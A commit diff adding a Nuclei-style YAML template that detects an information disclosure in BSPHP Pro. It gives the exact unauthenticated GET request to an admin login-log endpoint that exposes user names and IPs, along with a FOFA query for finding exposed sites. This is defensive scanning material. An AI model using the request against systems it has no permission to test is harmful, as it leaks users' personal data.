Create bsphp-info.yaml

http/vulnerabilities/bsphp-info.yaml

@@ -0,0 +1,35 @@
+id: bsphp-info
+
+info:
+  name: BSPHP - Information Disclosure
+  author: ritikchaddha
+  severity: low
+  description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="BSPHP"
+  tags: bsphp,info,disclosure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{"data":'
+          - '"id"'
+          - '"user"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200